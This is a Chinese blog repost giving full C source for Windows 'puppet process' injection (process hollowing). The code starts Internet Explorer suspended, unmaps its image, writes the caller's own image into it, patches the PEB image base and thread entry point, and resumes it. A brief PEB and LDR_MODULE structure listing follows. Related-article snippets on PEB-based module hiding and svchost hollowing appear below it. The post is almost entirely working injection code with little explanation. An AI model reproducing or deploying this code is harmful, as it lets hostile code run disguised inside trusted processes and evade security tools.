改写PEB在傀儡进程执行代码

最新推荐文章于 2023-08-13 12:20:10 发布
最新推荐文章于 2023-08-13 12:20:10 发布
阅读量765 收藏
点赞数
分类专栏: windows程序设计

方法来源于shadow3,我整理下;

#include <windows.h>
#include <stdio.h>

#pragma comment(lib,"ntdll.lib")

typedef long NTSTATUS;

typedef struct _ChildProcessInfo 

 DWORD dwBaseAddress; 
 DWORD dwReserve; 
} CHILDPROCESS, *PCHILDPROCESS;

NTSYSAPI NTSTATUS NTAPI ZwUnmapViewOfSection(HANDLE ProcessHandle,PVOID BaseAddress);

int main(int argc, char* argv[])
{
 char IeModule[MAX_PATH] = {0};
 char SelfModule[MAX_PATH] = {0};

 HMODULE hModule;
 DWORD dwImageSize;
 PIMAGE_DOS_HEADER pDos_Header = NULL;
 PIMAGE_NT_HEADERS pNt_Header  = NULL;

 STARTUPINFO si = {0};
 PROCESS_INFORMATION pi;
 CONTEXT  ThreadContext;
 DWORD *pPEB,dwRead;
 LPVOID lpVirAddress = NULL;
 CHILDPROCESS ChildProcess;

 GetSystemDirectory(IeModule,MAX_PATH);
 IeModule[2] = '\0';
 lstrcat(IeModule,"\\Program Files\\Internet Explorer\\iexplore.exe");
 GetModuleFileName(NULL,SelfModule,MAX_PATH);
 if(!strcmp(IeModule,SelfModule))
 {
  MessageBox(NULL,"fuck , ok","rhett",MB_OK);
  return 0;
 }

 hModule = GetModuleHandle(NULL);  //得到自己进程装载的基地址
 if(hModule==NULL)
 {
  printf("get self module handle failed\n");
  return -1;
 }

 pDos_Header = (PIMAGE_DOS_HEADER)hModule;
 pNt_Header  = (PIMAGE_NT_HEADERS)((DWORD)hModule + pDos_Header->e_lfanew);

// 得到内存映象的大小
 _asm
 {
  mov  ecx,0x30
  mov  eax,fs:[ecx]
  mov  eax,[eax + 0x0c]
  mov  esi,[eax + 0x0c]
  add  esi,0x20
  lodsd
  mov  dwImageSize,eax
 }

 CreateProcess(
     NULL,
     IeModule,
     NULL,
     NULL,
     0,
     CREATE_SUSPENDED,
     NULL,
     NULL,
     &si,
     &pi
     );

 ThreadContext.ContextFlags = CONTEXT_FULL;
 GetThreadContext(pi.hThread,&ThreadContext);

 pPEB = (DWORD*)ThreadContext.Ebx;  //得到peb
 
 ReadProcessMemory(                //得到装载地址      
      pi.hProcess,
      &pPEB[2],
      (LPVOID)&(ChildProcess.dwBaseAddress),
      sizeof(DWORD),
      &dwRead
      );

 ZwUnmapViewOfSection(pi.hProcess,(PVOID)ChildProcess.dwBaseAddress);
 lpVirAddress = VirtualAllocEx(pi.hProcess,(LPVOID)hModule,dwImageSize,MEM_RESERVE | MEM_COMMIT,PAGE_EXECUTE_READWRITE);
 // 重写装载地址
 WriteProcessMemory(pi.hProcess,&pPEB[2],&lpVirAddress,sizeof(DWORD),&dwRead);
 // 写内存映象
 WriteProcessMemory(pi.hProcess,lpVirAddress,hModule,dwImageSize,&dwRead);

 ThreadContext.ContextFlags = CONTEXT_FULL|CONTEXT_DEBUG_REGISTERS;

 if((DWORD)lpVirAddress==ChildProcess.dwBaseAddress)
 {
  ThreadContext.Eax = pNt_Header->OptionalHeader.ImageBase + pNt_Header->OptionalHeader.AddressOfEntryPoint;
 }
 else
 {
  ThreadContext.Eax = (DWORD)lpVirAddress + pNt_Header->OptionalHeader.AddressOfEntryPoint;
 }

 SetThreadContext(pi.hThread,&ThreadContext);
 ResumeThread(pi.hThread);

 return 0;
}

//-----------------------------------------------------------------------------------

用到的几个重要数据结构:

peb 的结构太长,只写前几个,这里也只用到偏移8byte的字段

struct _PEB

+0x000  InheritedAddressSpace;

+0x001  ReadImageFileExecOptions;

+0x002  BeingDebugged;

+003  SpareBool;

+004  Mutant;

+008  ImageBaseAddress;

+0x00C  Ldr

...............

typedef struct _LDR_MODULE
{
    LIST_ENTRY        InLoadOrderModuleList;            // +0x00
    LIST_ENTRY        InMemoryOrderModuleList;          // +0x08
    LIST_ENTRY        InInitializationOrderModuleList;  // +0x10
    PVOID             BaseAddress;                      // +0x18
    PVOID             EntryPoint;                       // +0x1c
    ULONG             SizeOfImage;                      // +0x20
    UNICODE_STRING    FullDllName;                      // +0x24
    UNICODE_STRING    BaseDllName;                      // +0x2c
    ULONG             Flags;                            // +0x34
    SHORT             LoadCount;                        // +0x38
    SHORT             TlsIndex;                         // +0x3a
    LIST_ENTRY        HashTableEntry;                   // +0x3c
    ULONG             TimeDateStamp;                    // +0x44
                                                        // +0x48
} LDR_MODULE, *PLDR_MODULE;

转自http://9994918.blog.hexun.com/57813507_d.html

woswod
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
修改PEB,断链隐藏模块成功
weixin_34319999的博客
06-24 382
修改PEB,断链隐藏模块成功 继续实践之前的想法,就是断掉如下这个结构中的双向链表: typedef struct _LDR_MODULE { LIST_ENTRY InLoadOrderModuleList; LIST_ENTRY InMemoryOrderModuleList; LIST_ENTRY...
6.24~~~~(渗透技术学习)
m0_72827793的博客
06-24 632
利用WindowsLoader开机时会执行sdb文件,sdb文件中包含了很多shim文件,shim文件可以修改程序的代码,而shim文件可以直接用Microsoft Application Compatibility Toolkit这个工具生成在Microsoft Application Compatibility Toolkit工具中可以使用选择函数Command line填入的方式直接生成shim文件。
使用 ZwUnmapViewOfSection 卸载并替换内存镜像
weixin_41875267的博客
09-09 873
The ZwUnmapViewOfSection routine unmaps a view of a section from the virtual address space of a subject process. NTSTATUS ZwUnmapViewOfSection( IN HANDLE ProcessHandle, IN PVOID BaseAddress ); 这个函数在 wdm.h 里声明,它的功能是卸载进程的内存镜像(Image Buff...
MyHider.zip_peb_peb模块隐藏_vad_模块隐藏_进程隐藏
07-14
修改PEB的模块列表,可以使得某些恶意代码不显示在正常的进程模块列表中,从而增加其隐蔽性。 PEB模块隐藏是通过篡改PEB中的InInitializationOrderModuleList和InLoadOrderModuleList等链表,将恶意模块从进程的...
PEBFake:PEBFake(修改PEB 伪装当前进程路径、参数等)
05-27
在Windows操作系统中,PEB是每个进程的核心数据结构,它存储了与进程执行环境有关的重要信息。通过篡改PEB,攻击者可以隐藏真实的进程信息,逃避安全软件的检测,或者进行其他恶意活动。 首先,我们需要了解PEB结构...
获取父进程的ID.获取父进程ID的代码 NtQueryInformationProces
03-20
在给出的压缩包文件中,`parent.cpp`可能包含了类似上述的实现,而`parent.exe`是编译后的可执行文件,当你运行它时,它将输出它的父进程ID。 总结来说,获取父进程ID的关键在于使用`NtQueryInformationProcess` ...
如何获取系统进程的命令行VC源代码
03-15
在Windows NT/2000系统中获取系统进程的命令行(如果有的话),它适用于几乎...这个结构成员指向PEB(在目标进程的地址空间中)结构,也就是进程环境块(Process Environment Block)结构。 关键字:process,进程
Windows进程模块查看器-支持32位和64位进程
05-06
本工具通过读取进程PEB数据遍历进程所加载的模块信息,包括模块名,模块路径,模块基地址等信息,支持64位和32位进程
C语言0xc0000142错误,[求助]C语言 傀儡进程替换报错0Xc0000005 求大神帮忙看看
weixin_39980082的博客
05-17 285
创建了一个CREATE_SUSPENDED的傀儡进程,用幕后进程替换了傀儡进程之后报错0xc0000005,弄了好几天也没弄懂,我裂开了,哪位大侠路过帮帮忙WIN7 x64系统,vs2017 x86编译器,两个进程都是32位进程。typedef NTSYSAPI NTSTATUS(__stdcall *ZwUnmapViewOfSection)(HANDLE, PVOID);int main(){...
代码注入之傀儡进程
sevenpic的专栏
09-13 1975
 傀儡进程——Exe注入2009-09-17 16:29#include "stdafx.h"#include typedef long NTSTATUS;typedef NTSTATUS (__stdcall *pfnZwUnmapViewOfSection)(        IN HANDLE ProcessHandle,        IN LPVOID BaseAddress        );BOOL CreateIEProcess();PROCESS_INFORMATION pi  = {0};
在NT中直接访问物理内存
11-13 3553
P.bhw98{ PADDING-RIGHT: 0px; PADDING-LEFT: 0px; FONT-SIZE: 9pt; PADDING-BOTTOM: 0px; MARGIN: 10px 0px 5px; LINE-HEIGHT: normal; PADDING-TOP: 0px; FONT-FAMIL
创建傀儡进程svchost.exe并注入DLL文件(Shellcode)
最新发布
【Rainbow Network Technology co., LTD】
08-13 735
本文主要利用 SetThreadContext 修改进程中的线程上下文来实现Dll注入(ShellCode)。
傀儡进程
苞米地里捉小鸡的博客
10-13 630
背景 傀儡进程本质上是借用正常的软件进程或是系统进程的外壳来执行非正常的恶意操作。 函数介绍 1.GetThreadContext 获取指定线程的上下文 2.SetThreadContext 设置指定线程的上下文 3.ResumeThread 减少线程的暂停计数。当暂停计数递减到零时,恢复线程的执行 实现原理 (1)第一步 利用CreateProcess创建进程并且使用CREATE_SUSPENDED标志挂起主线程 bRet = ::CreateProcess(pszFilePat
滴水逆向三期 win10 ASLR UnmapViewOfSection傀儡进程 加密壳项目
四位的博客
12-27 2072
特意加了一个win10标题, 碰到0xc0000005的朋友就不要再浪费时间了, 我在这个问题上花了整整一天 概要 利用挂起创建进程, 然后卸载源程序(以下统称src)镜像(ps: 非必须选项),
创建傀儡进程代码
Sven的忘却日记
07-29 2016
相比传统的创建傀儡进程的方法,更简单粗暴一些,不用卸载目标进程空间内存。直接利用现有内存进行覆盖写入即可。 减少了一些步骤。 具体步骤: 1.挂起模式创建svchost.exe 2.获取进程入口点 3.将shellcode写到入口点 4.恢复线程执行 #include "stdafx.h" #include <windows.h> #include <Winternl.h>...
动态加载EXE文件到内存执行
zzz3265的专栏
10-14 4845
//*******************************************************************************************************// loadEXE.cpp : Defines the entry point for the console application.//// Proof-Of-Concept Co
windows 进程保护 C++代码
05-19
在 Windows 操作系统中,可以使用以下方法来保护 C++ 代码: 1. 使用代码混淆器:代码混淆器可以将代码转换成难以阅读和理解的形式,从而使攻击者难以分析和修改代码。常见的代码混淆器包括 Themida、VMProtect 等...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值